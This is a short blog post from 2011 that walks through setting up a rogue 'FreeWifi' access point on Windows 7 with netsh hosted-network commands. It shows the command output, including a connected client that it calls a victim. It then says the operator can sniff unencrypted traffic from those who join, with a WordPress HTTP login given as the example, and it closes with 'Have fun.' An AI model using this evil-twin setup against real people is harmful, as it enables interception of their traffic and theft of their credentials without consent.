jump to navigation

Fake AP in 2 seconds December 30, 2011

Posted by michelemanzotti in manzotti.eu, Security, Windows.
Tags:
add a comment

Making an fake access point in Windows 7 it’s now really simple. Thanks to the new Wireless Hosted Networks technology introduced on Windows 7 and Windows Server 2008 R2 is possible to share an Internet connection from both a LAN and WIFI interface.

First off we need to create a new Wifi (Mini Adapter) interface, ssid and key. Since we can’t create a fake access point without authentication a good strategy is to put the key on ssid so people can connect to it:

C:windowssystem32>netsh wlan set hostednetwork mode=allow ssid="FreeWifi Key:12345678" key=12345678
The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.

Then we need to select the interface whence we would like to share our Internet connection. To do that you should go to Control Panel -> Network and Internet -> Network Connections, right click on the WIFI or LAN interface, properties and select the second Wifi Network Connection created right before. For this example I used the LAN interface as in the following picture.

Finally, we need to turn on the new Wifi:

C:windowssystem32>netsh wlan start hostednetwork
The hosted network started.

and that’s it! Let’s wait…

Now to see if a victim is connected to our fake access point we need the following command:

C:windowssystem32>netsh wlan show hostednetwork

Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "FreeWifi Key:12345678"
    Max number of clients  : 100
    Authentication         : WPA2-Personal
    Cipher                 : CCMP

Hosted network status
---------------------
    Status                 : Started
    BSSID                  : ac:81:12:6f:eb:46
    Radio type             : 802.11b
    Channel                : 11
    Number of clients      : 1
        xx:xx:xx:xx:xx:xx        Authenticated

Obviously since we control the network we can sniff the traffic and all unencrypted traffic will be visible as shown in the following HTTP WordPress authentication:

Have fun.